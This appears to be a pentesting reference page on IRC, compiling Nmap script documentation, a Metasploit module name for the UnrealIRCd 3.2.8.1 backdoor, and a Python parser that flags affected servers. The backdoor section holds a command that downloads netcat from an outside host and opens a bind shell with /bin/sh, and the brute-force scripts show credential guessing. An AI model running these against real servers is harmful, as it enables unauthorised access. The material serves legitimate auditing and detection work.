About IRC

Internet Relay Chat (IRC) is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model. IRC clients are computer programs that users install on their system, or web-based applications running either locally in the browser or on a third-party server. These clients communicate with chat servers to transfer messages to other clients. IRC is mainly designed for group communication in discussion forums, called channels, but also allows one-on-one communication via private messages as well as chat and data transfer, including file sharing.

NMAP

File irc-info

Script types: portrule 
Categories: default, discovery, safe
Download: https://svn.nmap.org/nmap/scripts/irc-info.nse

User Summary

Gathers information from an IRC server.

It uses STATS, LUSERS, and other queries to obtain this information.

Example Usage

nmap -sV -sC <target>

Script Output

6665/tcp open     irc
| irc-info:
|   server: asimov.freenode.net
|   version: ircd-seven-1.1.3(20111112-b71671d1e846,charybdis-3.4-dev). asimov.freenode.net
|   servers: 31
|   ops: 36
|   chans: 48636
|   users: 84883
|   lservers: 1
|   lusers: 4350
|   uptime: 511 days, 23:02:29
|   source host: source.example.com
|_  source ident: NONE or BLOCKED

File irc-unrealircd-backdoor

Script types: portrule 
Categories: exploit, intrusive, malware, vuln
Download: https://svn.nmap.org/nmap/scripts/irc-unrealircd-backdoor.nse

User Summary

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.

The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned) we have no way of getting the output of the command. It can, however, be used to start a netcat listener as demonstrated here:

  $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  $ ncat -vv localhost 4444
  Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
  Ncat: Connected to 127.0.0.1:4444.
  pwd
  /home/ron/downloads/Unreal3.2-bad
  whoami
  ron

Metasploit can also be used to exploit this vulnerability.

In addition to running arbitrary commands, the irc-unrealircd-backdoor.kill script argument can be passed, which simply kills the UnrealIRCd process.

Reference:

File irc-brute

Script types: portrule 
Categories: brute, intrusive
Download: https://svn.nmap.org/nmap/scripts/irc-brute.nse

User Summary

Performs brute force password auditing against IRC (Internet Relay Chat) servers.

Script Arguments

passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb

See the documentation for the unpwdb library.

creds.[service], creds.global

See the documentation for the creds library.

brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass

See the documentation for the brute library.

Example Usage

nmap --script irc-brute -p 6667 <ip>

Script Output

PORT     STATE SERVICE
6667/tcp open  irc
| irc-brute:
|   Accounts
|     password - Valid credentials
|   Statistics
|_    Performed 1927 guesses in 36 seconds, average tps: 74

File irc-sasl-brute

Script types: portrule 
Categories: brute, intrusive
Download: https://svn.nmap.org/nmap/scripts/irc-sasl-brute.nse

User Summary

Performs brute force password auditing against IRC (Internet Relay Chat) servers supporting SASL authentication.

Script Arguments

irc-sasl-brute.threads

The number of threads to use while brute-forcing. Defaults to 2.

passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb

See the documentation for the unpwdb library.

creds.[service], creds.global

See the documentation for the creds library.

brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass

See the documentation for the brute library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script irc-sasl-brute -p 6667 <ip>

Script Output

PORT     STATE SERVICE REASON
6667/tcp open  irc     syn-ack
| irc-sasl-brute:
|   Accounts
|     root:toor - Valid credentials
|   Statistics
|_    Performed 60 guesses in 29 seconds, average tps: 2

Metasploit

unix/irc/unreal_ircd_3281_backdoor

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

use unix/irc/unreal_ircd_3281_backdoor
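
For inventory work, the irc-info output shown earlier can be parsed to list servers whose version banner names Unreal3.2.8.1, the release the backdoored archive belonged to. This is an added example, not code from Nmap or Metasploit; the host names, addresses and field values in the sample are constructed, and a match only means the installed source should be verified against a known-good archive.

```python
import re

# Constructed sample of Nmap output (hosts, addresses and values are made up).
SAMPLE = """\
Nmap scan report for irc1.example.com (192.0.2.10)
6667/tcp open  irc
| irc-info:
|   server: irc1.example.com
|   version: Unreal3.2.8.1. irc1.example.com
|   users: 12
|_  uptime: 511 days, 23:02:29
Nmap scan report for irc2.example.com (192.0.2.11)
6665/tcp open  irc
| irc-info:
|   version: ircd-seven-1.1.3. irc2.example.com
|   uptime: 2 days, 01:00:00
| irc-brute:
|   Statistics
|_    Performed 60 guesses in 29 seconds, average tps: 2
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
SCRIPT_RE = re.compile(r"^\|[ _]([\w-]+):")         # "| irc-info:" header line
FIELD_RE = re.compile(r"^\|[ _]\s+([^:]+): (.*)$")  # "|   key: value" line

def parse_irc_info(text):
    """Return one dict per irc-info block: host, port and the reported fields."""
    results, host, port, cur = [], None, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, cur = m.group(1), None
        elif m := PORT_RE.match(line):
            port, cur = int(m.group(1)), None
        elif m := SCRIPT_RE.match(line):
            # Only collect fields that belong to irc-info, not to other scripts.
            cur = {"host": host, "port": port} if m.group(1) == "irc-info" else None
            if cur is not None:
                results.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur[m.group(1).strip()] = m.group(2).strip()
    return results

def needs_review(results, release="Unreal3.2.8.1"):
    """List (host, port) whose version banner names the affected release."""
    return [(r["host"], r["port"]) for r in results
            if release.lower() in r.get("version", "").lower()]
```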